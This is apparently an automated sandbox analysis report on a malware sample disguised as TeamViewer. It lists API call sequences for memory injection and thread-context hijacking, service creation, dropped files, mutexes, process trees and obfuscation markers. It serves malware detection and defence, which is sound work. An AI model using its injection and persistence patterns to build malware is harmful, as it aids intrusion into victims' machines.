ProcessHeap,HeapFree,wsprintfA,ExitProcess,GetProcessHeap,HeapFree,GetProcessHeap,HeapFree,GetProcessHeap,HeapFree,GetProcessHeap,HeapFree,GetProcessHeap,HeapFree,GetProcessHeap,HeapFree,GetProcessHeap,HeapFree,GetProcessHeap,HeapFree,DestroyAcceleratorTable,DestroyAcceleratorTable,GetProcessHeap,HeapFree,GetProcessHeap,HeapFree,GetProcessHeap,HeapFree,lstrcmp,lstrcmp,GetProcessHeap,HeapFree,GetProcessHeap,HeapFree,GetProcessHeap,HeapFree,FreeLibrary,FreeLibrary,FreeLibrary,FreeLibrary,FreeLibrary,FreeLibrary,FreeLibrary,FreeLibrary,GetProcessHeap,HeapFree,GetProcessHeap,HeapFree,GetProcessHeap,HeapFree,GetProcessHeap,HeapFree,LocalFree,CloseHandle,CloseHandle,NtTerminateThread,CloseHandle, 8_2_6EAF8510
Source: C:\Windows\SysWOW64\svchost.exe Code function: 8_2_6EAFB0A0 NtQuerySystemInformation,VirtualAlloc,NtQuerySystemInformation,GetCurrentProcessId,GetCurrentThreadId,HeapAlloc,HeapReAlloc,VirtualFree, 8_2_6EAFB0A0
Source: C:\Windows\SysWOW64\svchost.exe Code function: 8_2_6EAF14E0 NtAllocateVirtualMemory,NtAllocateVirtualMemory, 8_2_6EAF14E0
Source: C:\Windows\SysWOW64\svchost.exe Code function: 8_2_6EAF4EF0 RtlZeroMemory,RtlZeroMemory,CreateProcessA,WaitForSingleObject,GetExitCodeProcess,NtTerminateProcess,CloseHandle,CloseHandle,CloseHandle, 8_2_6EAF4EF0
Source: C:\Windows\SysWOW64\svchost.exe Code function: 8_2_6EAFB2D0 RtlMoveMemory,NtFlushInstructionCache, 8_2_6EAFB2D0
Source: C:\Windows\SysWOW64\svchost.exe Code function: 8_2_6EAF2ED0 CreatePipe,RtlZeroMemory,RtlZeroMemory,CreateProcessA,CloseHandle,CloseHandle,GetProcessHeap,HeapAlloc,GetTickCount,ReadFile,MultiByteToWideChar,GetProcessHeap,HeapAlloc,MultiByteToWideChar,WideCharToMultiByte,GetProcessHeap,HeapAlloc,WideCharToMultiByte,GetProcessHeap,HeapFree,GetTickCount,ReadFile,GetProcessHeap,HeapReAlloc,GetProcessHeap,HeapFree,NtTerminateProcess,GetProcessHeap,HeapFree,CloseHandle,CloseHandle,CloseHandle,CloseHandle, 8_2_6EAF2ED0
Source: C:\Windows\SysWOW64\svchost.exe Code function: 8_2_6EAF18D0 NtProtectVirtualMemory, 8_2_6EAF18D0
Source: C:\Windows\SysWOW64\svchost.exe Code function: 8_2_6EAFAE20 NtOpenThread, 8_2_6EAFAE20
Source: C:\Windows\SysWOW64\svchost.exe Code function: 8_2_6EAF8400 NtQuerySystemInformation,RtlZeroMemory,NtQueryVirtualMemory,RtlCompareMemory,NtWriteVirtualMemory,NtFlushInstructionCache, 8_2_6EAF8400
Source: C:\Windows\SysWOW64\svchost.exe Code function: 8_2_6EAF1C00 FreeLibrary,FreeLibrary,GetProcessHeap,HeapFree,NtFreeVirtualMemory, 8_2_6EAF1C00
Source: C:\Windows\SysWOW64\svchost.exe Code function: 8_2_6EAFB270 NtResumeThread,NtClose,HeapFree, 8_2_6EAFB270
Source: C:\Windows\SysWOW64\svchost.exe Code function: 8_2_6EAF2640 RtlZeroMemory,NtCreateSection,NtMapViewOfSection,NtMapViewOfSection,RtlMoveMemory,NtUnmapViewOfSection,NtUnmapViewOfSection,NtClose, 8_2_6EAF2640
Source: C:\Windows\SysWOW64\svchost.exe Code function: 8_2_6EAF23B0 LoadLibraryA,LoadLibraryA,LoadLibraryA,LoadLibraryA,GetCommandLineA,lstrcmpiA,lstrcmpiA,StrRChrA,wsprintfA,OpenEventA,CreateEventA,RtlZeroMemory,CreateThread,NtTerminateThread,CloseHandle,VirtualFree,CloseHandle,CloseHandle,LocalFree,FreeLibrary,FreeLibrary,FreeLibrary,FreeLibrary,ExitProcess, 8_2_6EAF23B0
Source: C:\Windows\SysWOW64\svchost.exe Code function: 8_2_6EAF7790 PostThreadMessageA,WaitForSingleObject,NtTerminateThread,CloseHandle,PostQuitMessage,PostMessageA,CreateThread,CallWindowProcW, 8_2_6EAF7790
Source: C:\Windows\SysWOW64\svchost.exe Code function: 8_2_6EAFADE0 NtProtectVirtualMemory, 8_2_6EAFADE0
Source: C:\Windows\SysWOW64\svchost.exe Code function: 8_2_6EAF19F0 FreeLibrary,FreeLibrary,GetProcessHeap,HeapFree,NtFreeVirtualMemory,GetProcessHeap,HeapFree, 8_2_6EAF19F0
Source: C:\Windows\SysWOW64\svchost.exe Code function: 8_2_6EAFB1F0 NtSuspendThread,NtClose, 8_2_6EAFB1F0
Source: C:\Windows\SysWOW64\svchost.exe Code function: 8_2_6EAFAFC0 NtGetContextThread,NtSetContextThread, 8_2_6EAFAFC0
Source: C:\Windows\SysWOW64\svchost.exe Code function: 8_2_6EAFAD39 NtProtectVirtualMemory, 8_2_6EAFAD39
Source: C:\Windows\SysWOW64\svchost.exe Code function: 8_2_6EAFA500 NtQueryVirtualMemory, 8_2_6EAFA500
Source: C:\Windows\SysWOW64\svchost.exe Code function: 8_2_6EAF2750 GetFileAttributesA,GetProcessHeap,GetProcessHeap,HeapAlloc,wsprintfA,RtlZeroMemory,RtlZeroMemory,CreateProcessA,NtGetContextThread,NtSetContextThread,NtResumeThread,NtTerminateProcess,CloseHandle,CloseHandle,CloseHandle,GetProcessHeap,HeapFree, 8_2_6EAF2750
Source: C:\Windows\SysWOW64\svchost.exe Code function: 8_2_6EAF6D50 RtlZeroMemory,VirtualAlloc,RtlZeroMemory,GetLocaleInfoW,CharLowerW,RtlZeroMemory,RtlGetNtVersionNumbers,RtlZeroMemory,DestroyAcceleratorTable,DestroyAcceleratorTable,RtlMoveMemory,GetProcessHeap,HeapFree,RtlMoveMemory,GetProcessHeap,HeapFree,RtlMoveMemory,GetProcessHeap,HeapFree,SetTimer,GetMessageA,KillTimer,RtlZeroMemory,DestroyAcceleratorTable,DestroyAcceleratorTable,wsprintfW,GetPrivateProfileStringW,RtlMoveMemory,GetProcessHeap,HeapFree,GetForegroundWindow,GetWindowTextW,RtlMoveMemory,GetProcessHeap,HeapFree,GetWindowThreadProcessId,NtOpenProcess,GetModuleFileNameExW,RtlMoveMemory,GetProcessHeap,HeapFree,NtClose,Sleep,GetDlgItemTextA,StrTrimA,GetDlgItemTextA,VirtualFree,WritePrivateProfileStringA,GetProcessHeap,HeapAlloc,GetProcessHeap,HeapFree,CreateThread,CloseHandle,Sleep,GetProcessHeap,HeapFree,RtlZeroMemory,GetSystemTimeAsFileTime,RtlTimeToSecondsSince1970,GetPrivateProfileIntA,wsprintfA,WritePrivateProfileStringA,SetEvent,SetTimer,DispatchMessageA,GetMessageA,KillTimer,VirtualFree, 8_2_6EAF6D50
PE file does not import any functions
Source: Teamviewer_Resource_ja.dll.1.dr Static PE information: No import functions for PE file found
Sample file is different than original file name gathered from version info
Source: 77Etc0bR2v.exe, 00000001.00000002.248818109.0000000000409000.00000004.00020000.sdmp Binary or memory string: OriginalFilenameTeamViewer_Resource.dll\ vs 77Etc0bR2v.exe
Source: 77Etc0bR2v.exe, 00000001.00000002.249443051.000000000288E000.00000004.00000001.sdmp Binary or memory string: OriginalFilenameTeamViewer.exel& vs 77Etc0bR2v.exe
PE file contains strange resources
Source: 77Etc0bR2v.exe Static PE information: Resource name: RT_ICON type: GLS_BINARY_LSB_FIRST
Source: TeamViewer.exe.1.dr Static PE information: Resource name: RT_ICON type: GLS_BINARY_LSB_FIRST
Source: TeamViewer.exe.1.dr Static PE information: Resource name: RT_ICON type: GLS_BINARY_LSB_FIRST
Source: Teamviewer_Resource_ja.dll.1.dr Static PE information: Resource name: RT_BITMAP type: GLS_BINARY_LSB_FIRST
Source: Teamviewer_Resource_ja.dll.1.dr Static PE information: Resource name: RT_BITMAP type: GLS_BINARY_LSB_FIRST
Source: Teamviewer_Resource_ja.dll.1.dr Static PE information: Resource name: RT_BITMAP type: GLS_BINARY_LSB_FIRST
Source: Teamviewer_Resource_ja.dll.1.dr Static PE information: Resource name: RT_ICON type: GLS_BINARY_LSB_FIRST
Source: Teamviewer_Resource_ja.dll.1.dr Static PE information: Resource name: RT_ICON type: GLS_BINARY_LSB_FIRST
Source: Teamviewer_Resource_ja.dll.1.dr Static PE information: Resource name: RT_ICON type: GLS_BINARY_LSB_FIRST
Source: Teamviewer_Resource_ja.dll.1.dr Static PE information: Resource name: RT_ICON type: GLS_BINARY_LSB_FIRST
Source: Teamviewer_Resource_ja.dll.1.dr Static PE information: Resource name: RT_ICON type: GLS_BINARY_LSB_FIRST
Source: Teamviewer_Resource_ja.dll.1.dr Static PE information: Resource name: RT_ICON type: GLS_BINARY_LSB_FIRST
Source: Teamviewer_Resource_ja.dll.1.dr Static PE information: Resource name: RT_ICON type: GLS_BINARY_LSB_FIRST
Source: Teamviewer_Resource_ja.dll.1.dr Static PE information: Resource name: RT_ICON type: GLS_BINARY_LSB_FIRST
Tries to load missing DLLs
Source: C:\Windows\System32\svchost.exe Section loaded: xboxlivetitleid.dll
Source: C:\Windows\System32\svchost.exe Section loaded: cdpsgshims.dll
Contains functionality to delete services
Source: C:\Users\user\AppData\Roaming\TeamViewer\TeamViewer.exe Code function: 3_2_6EAF3700 OpenSCManagerA,OpenSCManagerA,OpenSCManagerA,OpenServiceA,QueryServiceStatus,ControlService,Sleep,QueryServiceStatus,Sleep,DeleteService,CloseServiceHandle,CloseServiceHandle, 3_2_6EAF3700
Source: 77Etc0bR2v.exe Virustotal: Detection: 37%
Source: 77Etc0bR2v.exe ReversingLabs: Detection: 37%
Source: C:\Users\user\Desktop\77Etc0bR2v.exe File read: C:\Users\user\Desktop\77Etc0bR2v.exe
Source: 77Etc0bR2v.exe Static PE information: Section: .text IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_READ
Source: C:\Users\user\Desktop\77Etc0bR2v.exe Key opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers
Source: unknown Process created: C:\Users\user\Desktop\77Etc0bR2v.exe 'C:\Users\user\Desktop\77Etc0bR2v.exe'
Source: C:\Users\user\Desktop\77Etc0bR2v.exe Process created: C:\Users\user\AppData\Roaming\TeamViewer\TeamViewer.exe 'C:\Users\user\AppData\Roaming\TeamViewer\TeamViewer.exe' f
Source: unknown Process created: C:\Windows\System32\svchost.exe C:\Windows\System32\svchost.exe -k netsvcs -p -s BITS
Source: unknown Process created: C:\Users\user\AppData\Roaming\TeamViewer\TeamViewer.exe C:\Users\user\AppData\Roaming\TeamViewer\TeamViewer.exe
Source: unknown Process created: C:\Windows\System32\svchost.exe C:\Windows\System32\svchost.exe -k netsvcs -p
Source: unknown Process created: C:\Windows\SysWOW64\svchost.exe c:\windows\syswow64\svchost.exe -k 'usbportsmanagergrp' -svcr 'teamviewer.exe' -s USBManager
Source: unknown Process created: C:\Windows\System32\svchost.exe C:\Windows\System32\svchost.exe -k LocalSystemNetworkRestricted -p -s NcbService
Source: unknown Process created: C:\Windows\System32\svchost.exe c:\windows\system32\svchost.exe -k localservice -p -s CDPSvc
Source: unknown Process created: C:\Windows\System32\svchost.exe c:\windows\system32\svchost.exe -k networkservice -p -s DoSvc
Source: unknown Process created: C:\Windows\System32\svchost.exe C:\Windows\System32\svchost.exe -k NetworkService -p
Source: unknown Process created: C:\Windows\System32\SgrmBroker.exe C:\Windows\system32\SgrmBroker.exe
Source: unknown Process created: C:\Windows\System32\svchost.exe c:\windows\system32\svchost.exe -k localservicenetworkrestricted -p -s wscsvc
Source: unknown Process created: C:\Windows\System32\svchost.exe C:\Windows\System32\svchost.exe -k netsvcs -p
Source: unknown Process created: C:\Users\user\AppData\Roaming\TeamViewer\TeamViewer.exe 'C:\Users\user\AppData\Roaming\TeamViewer\TeamViewer.exe' f
Source: unknown Process created: C:\Users\user\AppData\Roaming\TeamViewer\TeamViewer.exe 'C:\Users\user\AppData\Roaming\TeamViewer\TeamViewer.exe' f
Source: unknown Process created: C:\Users\user\AppData\Roaming\TeamViewer\TeamViewer.exe C:\Users\user\AppData\Roaming\TeamViewer\TeamViewer.exe
Source: unknown Process created: C:\Users\user\AppData\Roaming\TeamViewer\TeamViewer.exe C:\Users\user\AppData\Roaming\TeamViewer\TeamViewer.exe
Source: unknown Process created: C:\Windows\System32\svchost.exe C:\Windows\System32\svchost.exe -k netsvcs -p
Source: C:\Windows\System32\svchost.exe Process created: C:\Program Files\Windows Defender\MpCmdRun.exe 'C:\Program Files\Windows Defender\mpcmdrun.exe' -wdenable
Source: C:\Program Files\Windows Defender\MpCmdRun.exe Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Users\user\Desktop\77Etc0bR2v.exe Process created: C:\Users\user\AppData\Roaming\TeamViewer\TeamViewer.exe 'C:\Users\user\AppData\Roaming\TeamViewer\TeamViewer.exe' f
Source: C:\Windows\System32\svchost.exe Process created: C:\Program Files\Windows Defender\MpCmdRun.exe 'C:\Program Files\Windows Defender\mpcmdrun.exe' -wdenable
Source: C:\Users\user\Desktop\77Etc0bR2v.exe Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{20D04FE0-3AEA-1069-A2D8-08002B30309D}\InProcServer32
Source: C:\Users\user\AppData\Roaming\TeamViewer\TeamViewer.exe Code function: 3_2_6EAF5B40 GetProcessHeap,HeapFree,CharLowerA,GetProcessHeap,HeapAlloc,lstrlenA,RtlComputeCrc32,Sleep,Sleep,GetDlgItem,PostMessageA,PostMessageA,PostMessageA,Sleep,Sleep,PostMessageA,Sleep,GetTickCount,RtlRandom,wsprintfA,wsprintfA,GetFileAttributesA,DeleteFileA,wsprintfA,ExpandEnvironmentStringsA,PathIsRelativeA,wsprintfA,StrRChrA,SHCreateDirectoryExA,OpenProcessToken,LookupPrivilegeValueW,AdjustTokenPrivileges,ExitWindowsEx,wsprintfA,wsprintfA,DeleteFileA,GetTickCount,RtlRandom,wsprintfA,FrostCrashedWindow,FrostCrashedWindow,WritePrivateProfileStringA,wsprintfA,wsprintfA,GetProcessHeap,HeapFree,LocalFree,HeapFree,GetProcessHeap,WaitForSingleObject,CloseHandle,GetProcessHeap,HeapFree,GetProcessHeap,HeapFree,GetProcessHeap,HeapFree, 3_2_6EAF5B40
Source: C:\Users\user\AppData\Roaming\TeamViewer\TeamViewer.exe Code function: 6_2_004C6E36 AdjustTokenPrivileges, 6_2_004C6E36
Source: C:\Users\user\AppData\Roaming\TeamViewer\TeamViewer.exe Code function: 6_2_6EAF5B40 GetProcessHeap,HeapFree,CharLowerA,GetProcessHeap,HeapAlloc,lstrlenA,RtlComputeCrc32,Sleep,Sleep,GetDlgItem,PostMessageA,PostMessageA,PostMessageA,Sleep,Sleep,PostMessageA,Sleep,GetTickCount,RtlRandom,wsprintfA,wsprintfA,GetFileAttributesA,DeleteFileA,wsprintfA,ExpandEnvironmentStringsA,PathIsRelativeA,wsprintfA,StrRChrA,SHCreateDirectoryExA,OpenProcessToken,LookupPrivilegeValueW,AdjustTokenPrivileges,ExitWindowsEx,wsprintfA,wsprintfA,DeleteFileA,GetTickCount,RtlRandom,wsprintfA,WritePrivateProfileStringA,wsprintfA,wsprintfA,GetProcessHeap,HeapFree,LocalFree,HeapFree,GetProcessHeap,WaitForSingleObject,CloseHandle,GetProcessHeap,HeapFree,GetProcessHeap,HeapFree,GetProcessHeap,HeapFree, 6_2_6EAF5B40
Source: C:\Windows\SysWOW64\svchost.exe Code function: 8_2_6EAF5B40 GetProcessHeap,HeapFree,CharLowerA,GetProcessHeap,HeapAlloc,lstrlenA,RtlComputeCrc32,Sleep,Sleep,GetDlgItem,PostMessageA,PostMessageA,PostMessageA,Sleep,Sleep,PostMessageA,Sleep,GetTickCount,RtlRandom,wsprintfA,wsprintfA,GetFileAttributesA,DeleteFileA,wsprintfA,ExpandEnvironmentStringsA,PathIsRelativeA,wsprintfA,StrRChrA,SHCreateDirectoryExA,OpenProcessToken,LookupPrivilegeValueW,AdjustTokenPrivileges,ExitWindowsEx,wsprintfA,wsprintfA,DeleteFileA,GetTickCount,RtlRandom,wsprintfA,WritePrivateProfileStringA,wsprintfA,wsprintfA,GetProcessHeap,HeapFree,LocalFree,HeapFree,GetProcessHeap,WaitForSingleObject,CloseHandle,GetProcessHeap,HeapFree,GetProcessHeap,HeapFree,GetProcessHeap,HeapFree, 8_2_6EAF5B40
Source: C:\Users\user\AppData\Roaming\TeamViewer\TeamViewer.exe WMI Queries: IWbemServices::ExecMethod - Root\Cimv2 : Win32_Process::Create
Source: C:\Users\user\AppData\Roaming\TeamViewer\TeamViewer.exe WMI Queries: IWbemServices::ExecMethod - Root\Cimv2 : Win32_Process::Create
Source: C:\Users\user\AppData\Roaming\TeamViewer\TeamViewer.exe WMI Queries: IWbemServices::ExecMethod - Root\Cimv2 : Win32_Process::Create
Source: C:\Users\user\Desktop\77Etc0bR2v.exe File created: C:\Users\user\AppData\Roaming\TeamViewer
Source: C:\Users\user\Desktop\77Etc0bR2v.exe File created: C:\Users\user\AppData\Local\Temp\nsa6984.tmp
Source: classification engine Classification label: mal80.evad.winEXE@22/12@4/4
Source: C:\Users\user\AppData\Roaming\TeamViewer\TeamViewer.exe Code function: 3_2_6EAF29D0 CoInitializeEx,CoCreateInstance,SysAllocString,SysAllocString,SysFreeString,CoSetProxyBlanket,SysAllocString,SysAllocString,SysFreeString,VariantInit,VariantInit,lstrlenW,SysAllocStringLen,GetProcessHeap,HeapFree,PathQuoteSpacesW,VariantInit,SysAllocString,GetProcessHeap,HeapFree,VariantInit,SysAllocString,SysFreeString,SysFreeString,SysFreeString,SysFreeString,SysFreeString, 3_2_6EAF29D0
Source: C:\Users\user\AppData\Roaming\TeamViewer\TeamViewer.exe Code function: OpenSCManagerA,OpenSCManagerA,OpenSCManagerA,OpenServiceA,wsprintfA,RegSetValueExA,wsprintfA,CreateServiceA,ChangeServiceConfig2A,wsprintfA,RegCreateKeyExA,lstrlenA,RegSetValueExA,RegCloseKey,wsprintfA,RegCreateKeyExA,RegSetValueExA,RegSetValueExA,RegCloseKey,wsprintfA,RegCreateKeyExA,RegSetValueExA,RegSetValueExA,lstrlenA,RegSetValueExA,RegSetValueExA,RegCloseKey,wsprintfA,RegCreateKeyExA,lstrlenA,RegSetValueExA,RegCloseKey,wsprintfA,RegCreateKeyExA,RtlZeroMemory,RegQueryValueExA,lstrcmpiA,RegSetValueExA,RegCloseKey,RtlZeroMemory,QueryServiceStatusEx,CloseServiceHandle,CloseServiceHandle, 3_2_6EAF3C60
Source: C:\Users\user\AppData\Roaming\TeamViewer\TeamViewer.exe Code function: OpenSCManagerA,OpenSCManagerA,OpenSCManagerA,OpenServiceA,wsprintfA,RegSetValueExA,wsprintfA,CreateServiceA,ChangeServiceConfig2A,wsprintfA,RegCreateKeyExA,lstrlenA,RegSetValueExA,RegCloseKey,wsprintfA,RegCreateKeyExA,RegSetValueExA,RegSetValueExA,RegCloseKey,wsprintfA,RegCreateKeyExA,RegSetValueExA,RegSetValueExA,lstrlenA,RegSetValueExA,RegSetValueExA,RegCloseKey,wsprintfA,RegCreateKeyExA,lstrlenA,RegSetValueExA,RegCloseKey,wsprintfA,RegCreateKeyExA,RtlZeroMemory,RegQueryValueExA,lstrcmpiA,RegSetValueExA,RegCloseKey,RtlZeroMemory,QueryServiceStatusEx,CloseServiceHandle,CloseServiceHandle, 6_2_6EAF3C60
Source: C:\Windows\SysWOW64\svchost.exe Code function: OpenSCManagerA,OpenSCManagerA,OpenSCManagerA,OpenServiceA,wsprintfA,RegSetValueExA,wsprintfA,CreateServiceA,ChangeServiceConfig2A,wsprintfA,RegCreateKeyExA,lstrlenA,RegSetValueExA,RegCloseKey,wsprintfA,RegCreateKeyExA,RegSetValueExA,RegSetValueExA,RegCloseKey,wsprintfA,RegCreateKeyExA,RegSetValueExA,RegSetValueExA,lstrlenA,RegSetValueExA,RegSetValueExA,RegCloseKey,wsprintfA,RegCreateKeyExA,lstrlenA,RegSetValueExA,RegCloseKey,wsprintfA,RegCreateKeyExA,RtlZeroMemory,RegQueryValueExA,lstrcmpiA,RegSetValueExA,RegCloseKey,RtlZeroMemory,QueryServiceStatusEx,CloseServiceHandle,CloseServiceHandle, 8_2_6EAF3C60
Source: C:\Users\user\Desktop\77Etc0bR2v.exe File read: C:\Users\desktop.ini
Source: C:\Users\user\Desktop\77Etc0bR2v.exe Code function: 1_2_00404356 GetDlgItem,SetWindowTextA,SHBrowseForFolder,753CA680,lstrcmpi,lstrcat,SetDlgItemTextA,GetDiskFreeSpaceA,MulDiv,SetDlgItemTextA, 1_2_00404356
Source: C:\Users\user\AppData\Roaming\TeamViewer\TeamViewer.exe Code function: 3_2_6EAF96D0 SwitchDesktop,SetThreadDesktop,LoadLibraryA,GetProcessHeap,HeapAlloc,GetProcessHeap,RtlZeroMemory,GetSystemDirectoryA,PathAddBackslashA,lstrcatA,LoadLibraryExA,LoadStringW,LoadStringW,LoadStringW,LoadStringW,FormatMessageW,LoadStringW,wsprintfW,FormatMessageW,FreeLibrary,wsprintfW,GetLastError,GetProcessHeap,HeapAlloc,RtlZeroMemory,RtlZeroMemory,RtlZeroMemory,RtlZeroMemory,WritePrivateProfileStringW,CoTaskMemFree,GetProcessHeap,HeapFree,GetProcessHeap,HeapFree,FreeLibrary,Sleep,SwitchDesktop,SetThreadDesktop,Sleep, 3_2_6EAF96D0
Source: C:\Users\user\AppData\Roaming\TeamViewer\TeamViewer.exe Code function: 3_2_6EAF3C60 OpenSCManagerA,OpenSCManagerA,OpenSCManagerA,OpenServiceA,wsprintfA,RegSetValueExA,wsprintfA,CreateServiceA,ChangeServiceConfig2A,wsprintfA,RegCreateKeyExA,lstrlenA,RegSetValueExA,RegCloseKey,wsprintfA,RegCreateKeyExA,RegSetValueExA,RegSetValueExA,RegCloseKey,wsprintfA,RegCreateKeyExA,RegSetValueExA,RegSetValueExA,lstrlenA,RegSetValueExA,RegSetValueExA,RegCloseKey,wsprintfA,RegCreateKeyExA,lstrlenA,RegSetValueExA,RegCloseKey,wsprintfA,RegCreateKeyExA,RtlZeroMemory,RegQueryValueExA,lstrcmpiA,RegSetValueExA,RegCloseKey,RtlZeroMemory,QueryServiceStatusEx,CloseServiceHandle,CloseServiceHandle, 3_2_6EAF3C60
Source: C:\Users\user\AppData\Roaming\TeamViewer\TeamViewer.exe Mutant created: \Sessions\1\BaseNamedObjects\DynGateInstanceMutexH1
Source: C:\Users\user\AppData\Roaming\TeamViewer\TeamViewer.exe Mutant created: \Sessions\1\BaseNamedObjects\{C15730E2-145C-4c5e-B005-3BC753F42475}-once-flagMKKJJIAAAPEAAAAA
Source: C:\Windows\System32\conhost.exe Mutant created: \BaseNamedObjects\Local\SM0:4012:120:WilError_01
Source: C:\Users\user\AppData\Roaming\TeamViewer\TeamViewer.exe Mutant created: \Sessions\1\BaseNamedObjects\TeamViewer3_Win32_Instance_MutexH1
Source: C:\Users\user\AppData\Roaming\TeamViewer\TeamViewer.exe Mutant created: \Sessions\1\BaseNamedObjects\TeamViewer_Win32_Instance_MutexH1
Source: C:\Users\user\AppData\Roaming\TeamViewer\TeamViewer.exe Code function: 3_2_6EAF4E50 FindResourceW,LoadResource,SizeofResource,LockResource,GetProcessHeap,HeapAlloc,RtlMoveMemory,FreeResource, 3_2_6EAF4E50
Source: C:\Users\user\AppData\Roaming\TeamViewer\TeamViewer.exe File created: C:\Program Files (x86)\QS
Source: C:\Users\user\Desktop\77Etc0bR2v.exe File written: C:\Users\user\AppData\Roaming\TeamViewer\TeamViewer.ini
Source: C:\Windows\System32\svchost.exe File read: C:\Windows\System32\drivers\etc\hosts
Source: C:\Windows\System32\svchost.exe File read: C:\Windows\System32\drivers\etc\hosts
Source: C:\Users\user\AppData\Roaming\TeamViewer\TeamViewer.exe File read: C:\Windows\System32\drivers\etc\hosts
Source: C:\Users\user\AppData\Roaming\TeamViewer\TeamViewer.exe File read: C:\Windows\System32\drivers\etc\hosts
Source: C:\Users\user\AppData\Roaming\TeamViewer\TeamViewer.exe File read: C:\Windows\System32\drivers\etc\hosts
Source: C:\Users\user\AppData\Roaming\TeamViewer\TeamViewer.exe File read: C:\Windows\System32\drivers\etc\hosts
Source: 77Etc0bR2v.exe Static file information: File size 1828192 > 1048576
Source: 77Etc0bR2v.exe Static PE information: certificate valid
Source: Binary string: c:\TeamViewer5_Release\TeamViewer\qs_release\TeamViewer_qs.pdb source: 77Etc0bR2v.exe, 00000001.00000002.249443051.000000000288E000.00000004.00000001.sdmp, TeamViewer.exe, 00000003.00000000.248354539.0000000000733000.00000002.00020000.sdmp, TeamViewer.exe, 00000006.00000002.524713839.0000000000733000.00000002.00020000.sdmp, TeamViewer.exe, 00000011.00000002.336944696.0000000000733000.00000002.00020000.sdmp, TeamViewer.exe, 00000012.00000002.348837191.0000000000733000.00000002.00020000.sdmp, TeamViewer.exe, 00000013.00000002.342853199.0000000000733000.00000002.00020000.sdmp, TeamViewer.exe, 00000014.00000000.345802287.0000000000733000.00000002.00020000.sdmp
Source: Binary string: c:\TeamViewer5_Release\TeamViewer\qs_release\TeamViewer_qs.pdbPS source: 77Etc0bR2v.exe, 00000001.00000002.249443051.000000000288E000.00000004.00000001.sdmp, TeamViewer.exe, 00000003.00000000.248354539.0000000000733000.00000002.00020000.sdmp, TeamViewer.exe, 00000006.00000002.524713839.0000000000733000.00000002.00020000.sdmp, TeamViewer.exe, 00000011.00000002.336944696.0000000000733000.00000002.00020000.sdmp, TeamViewer.exe, 00000012.00000002.348837191.0000000000733000.00000002.00020000.sdmp, TeamViewer.exe, 00000013.00000002.342853199.0000000000733000.00000002.00020000.sdmp, TeamViewer.exe, 00000014.00000000.345802287.0000000000733000.00000002.00020000.sdmp
Source: Binary string: c:\TeamViewer5_Release\TeamViewer\qs_release\TV.pdb source: 77Etc0bR2v.exe, 00000001.00000002.249443051.000000000288E000.00000004.00000001.sdmp, TeamViewer.exe, 00000003.00000002.268193262.000000006EAFD000.00000002.00020000.sdmp, TeamViewer.exe, 00000006.00000002.536045317.000000006EAFD000.00000002.00020000.sdmp, svchost.exe, 00000008.00000002.514763598.000000006EAFD000.00000002.00020000.sdmp, TeamViewer.exe, 00000011.00000002.341816195.000000006EAFD000.00000002.00020000.sdmp, TeamViewer.exe, 00000012.00000002.362277725.000000006EAFD000.00000002.00020000.sdmp, TeamViewer.exe, 00000013.00000002.345987825.000000006EAFD000.00000002.00020000.sdmp, TeamViewer.exe, 00000014.00000002.367975860.000000006EAFD000.00000002.00020000.sdmp

Data Obfuscation:

Uses code obfuscation techniques (call, push, ret)
Source: C:\Users\user\AppData\Roaming\TeamViewer\TeamViewer.exe Code function: 3_2_6EAFC101 push ecx; ret 3_2_6EAFC114
Source: C:\Users\user\AppData\Roaming\TeamViewer\TeamViewer.exe Code function: 6_2_0075C004 push ebp; retf 6_2_0075C018
Source: C:\Users\user\AppData\Roaming\TeamViewer\TeamViewer.exe Code function: 6_2_0053E60D push ecx; ret 6_2_0053E620
Source: C:\Users\user\AppData\Roaming\TeamViewer\TeamViewer.exe Code function: 6_2_0053BD8D push ecx; ret 6_2_0053BDA0
Source: C:\Users\user\AppData\Roaming\TeamViewer\TeamViewer.exe Code function: 6_2_0075BFE4 push ebp; retf 6_2_0075C018
Source: C:\Users\user\AppData\Roaming\TeamViewer\TeamViewer.exe Code function: 6_2_6EAFC101 push ecx; ret 6_2_6EAFC114
Source: C:\Windows\SysWOW64\svchost.exe Code function: 8_2_6EAFC101 push ecx; ret 8_2_6EAFC114
Source: C:\Users\user\AppData\Roaming\TeamViewer\TeamViewer.exe Code function: 18_2_026C1E67 push edx; iretd 18_2_026C1E69
Source: C:\Users\user\AppData\Roaming\TeamViewer\TeamViewer.exe Code function: 18_2_026C062B push edi; retf 0019h 18_2_026C062C
Source: C:\Users\user\AppData\Roaming\TeamViewer\TeamViewer.exe Code function: 18_2_026C181B push ebp; retf 006Bh 18_2_026C181C
Source: C:\Users\user\AppData\Roaming\TeamViewer\TeamViewer.exe Code function: 18_2_026CA91B push edx; retn 0064h 18_2_026CA924
Source: C:\Users\user\AppData\Roaming\TeamViewer\TeamViewer.exe Code function: 18_2_026C1AF3 push esp; retf 0078h 18_2_026C1AF4
Source: C:\Users\user\AppData\Roaming\TeamViewer\TeamViewer.exe Code function: 18_2_026C12D7 push ebp; retf 0054h 18_2_026C1314
Source: C:\Users\user\AppData\Roaming\TeamViewer\TeamViewer.exe Code function: 18_2_026C15B2 push ebp; ret 18_2_026C15E9
Source: C:\Users\user\AppData\Roaming\TeamViewer\TeamViewer.exe Code function: 19_3_026E3A8E push eax; retf 19_3_026E3A99
Source: C:\Users\user\AppData\Roaming\TeamViewer\TeamViewer.exe Code function: 19_3_026AD4F0 push esp; ret 19_3_026AD4F8
Source: C:\Users\user\AppData\Roaming\TeamViewer\TeamViewer.exe Code function: 19_3_026AD070 push eax; ret 19_3_026AD077
Source: C:\Users\user\AppData\Roaming\TeamViewer\TeamViewer.exe Code function: 19_3_026AFB5E push ecx; retf 19_3_026AFB5F
Source: C:\Users\user\AppData\Roaming\TeamViewer\TeamViewer.exe Code function: 19_3_026AF306 push eax; ret 19_3_026AF31F
Source: C:\Users\user\AppData\Roaming\TeamViewer\TeamViewer.exe Code function: 19_3_026B2686 push ecx; retf 19_3_026B2687
Source: C:\Users\user\AppData\Roaming\TeamViewer\TeamViewer.exe Code function: 19_3_026CC376 push ecx; retf 19_3_026CC377
Source: C:\Users\user\AppData\Roaming\TeamViewer\TeamViewer.exe Code function: 19_3_026CCC32 push ecx; ret 19_3_026CCC33
